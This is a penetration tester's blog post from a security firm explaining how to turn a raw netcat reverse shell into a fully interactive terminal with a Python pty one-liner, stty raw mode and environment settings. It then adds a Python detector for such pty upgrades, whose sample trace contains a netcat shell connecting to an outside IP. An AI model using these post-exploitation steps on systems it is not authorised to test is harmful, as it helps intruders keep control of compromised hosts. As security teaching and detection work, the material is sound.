*This blog entry was originally published on July 27, 2015 on the original Polito Blog by Ian Duffy. It was re-posted on October 3, 2017 due to migrating to a new blog platform.
When penetration testing, sometimes we get netcat (or equivalent) shells back from Linux / Unix systems that come with some pretty severe restrictions. For example, if you run a command on the remote system that hangs or takes a long time to return, and you want to kill that command, hitting CTRL+C will actually kill netcat on your local system. Bye-bye shell! Another limitation is that some output from commands does not print correctly on the screen; for example, the up arrow produces garbled output instead of recalling the previous command typed into bash.
[Screenshot: Plain Netcat Reverse Shell with No Fixup]
Fortunately there is a fixup procedure to address this issue that I’ve found very useful. I have to give credit – I learned this by watching Phineas Fisher in the infamous video of the Sindicat Mossos de Esquadra (Catalan Police) hack. The following steps will help you fix up your netcat reverse shell so that you can use it much the same way as a regular remote terminal (SSH/Telnet) session.
Hopefully, the system on which you have a shell has Python installed. The quick and easy way to fix up the terminal with Python is via the following one-liner:
python -c 'import pty; pty.spawn("/bin/bash")'
[Screenshot: Netcat Reverse Shell after Python Fixup]
This command spawns bash inside a pseudo-terminal (pty) created by the Python interpreter, which gives you a normal command prompt. It also lets you run commands such as “su” and “sudo” on the remote system, which refuse to work without a tty.
Once you have a valid shell on the remote system, there is still the problem of terminal control and escape sequences on the local host killing off your netcat listener. To fix this, type the following commands:
<CTRL+Z> bg
stty raw -echo
fg
reset
[Screenshot: Netcat Reverse Shell After Control Character Fixup]
This backgrounds the netcat listener, puts your local terminal into raw mode and disables local echo. Typed characters are no longer printed by your local terminal, and control characters are passed straight through to the remote shell instead of being interpreted locally. This is what lets you use control characters over the netcat session. In addition to being able to use Ctrl+C to kill hung processes, we can also use other programs such as screen that rely on control characters for their normal operation.
export SHELL=/bin/bash
export HOME=<wherever you created your home directory>
export TERM=xterm-color
Note: The value of the TERM environment variable should be the output of the command echo $TERM on your local system so that control characters are interpreted properly.
Finally, we need to tell the remote system how big our local terminal window is (in rows and columns) so that it sends output back to us in the appropriate size. To find out how many rows and columns our local terminal is using, open up a new tab (CTRL+SHIFT+T) and type:
stty -a
Make a note of the value for rows and columns on the first line of the output. In your netcat shell, type the following command:
stty rows <row count> cols <col count>
where <row count> and <col count> are the values from the stty -a command.
[Screenshot: Setting Up Environment Variables]
That’s it. You should now have a fully functional shell over netcat that allows you to use control characters. This becomes powerful with the screen command because now you can have multiple terminals running multiple processes over a single reverse shell. If you haven’t had any experience with screen, I highly recommend you get familiar with it.
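The flip side of the procedure above is how it looks on the remote host: a raw-socket tool (nc, ncat, socat) with a shell beneath it, then an interpreter spawning a pty, then stty fixing rows and columns. The following is an added example, not code from the original post, that scans a constructed process-execution trace (the line format is an assumption, loosely modelled on an auditd/EDR exec log) for pty.spawn invocations and ranks them by whether a network tool sits in their ancestry, so a pty upgrade under an SSH login is rated low while one under netcat is rated high.

```python
import re
from typing import Dict, List

# Constructed sample trace. The "pid= ppid= comm= cmdline=" shape is an
# assumption for this example, not any real tool's output format.
SAMPLE_LOG = """\
pid=4101 ppid=1 comm=nc cmdline="nc 198.51.100.7 4444"
pid=4102 ppid=4101 comm=sh cmdline="/bin/sh"
pid=4110 ppid=4102 comm=python cmdline="python -c import pty; pty.spawn('/bin/bash')"
pid=4111 ppid=4110 comm=bash cmdline="/bin/bash"
pid=4112 ppid=4111 comm=stty cmdline="stty rows 50 cols 200"
pid=5001 ppid=1 comm=sshd cmdline="sshd: alice [priv]"
pid=5002 ppid=5001 comm=bash cmdline="-bash"
pid=5003 ppid=5002 comm=python cmdline="python -c import pty; pty.spawn('/bin/bash')"
"""

LINE_RE = re.compile(r'pid=(\d+) ppid=(\d+) comm=(\S+) cmdline="(.*)"')
PTY_RE = re.compile(r"pty\.spawn\s*\(")
# Parents that mean the shell arrived over a raw socket rather than a login.
NET_TOOLS = {"nc", "ncat", "netcat", "socat"}

def parse_log(text: str) -> Dict[int, dict]:
    """Build a pid -> {ppid, comm, cmdline} map from the trace lines."""
    procs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            pid, ppid, comm, cmd = m.groups()
            procs[int(pid)] = {"ppid": int(ppid), "comm": comm, "cmdline": cmd}
    return procs

def ancestry(procs: Dict[int, dict], pid: int) -> List[str]:
    """comm names from the process up to the root, stopping at unknown pids."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid]["comm"])
        pid = procs[pid]["ppid"]
    return chain

def find_pty_upgrades(text: str) -> List[dict]:
    """Flag interpreter invocations that spawn a pty-backed shell; rate them
    high when a raw-socket tool is in the ancestry (reverse-shell fixup)."""
    procs = parse_log(text)
    findings = []
    for pid, p in sorted(procs.items()):
        if not PTY_RE.search(p["cmdline"]):
            continue
        chain = ancestry(procs, pid)
        over_socket = any(c in NET_TOOLS for c in chain)
        findings.append({"pid": pid, "chain": chain,
                         "severity": "high" if over_socket else "low"})
    return findings
```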
Happy hunting.
Polito, Inc. offers a wide range of security consulting services including penetration testing, vulnerability assessments, incident response, digital forensics, and more. If your business or your clients have any cyber security needs, contact our experts and experience what Masterful Cyber Security is all about.
E-mail: info@politoinc.com
Phone: 571-969-7039
Website: politoinc.com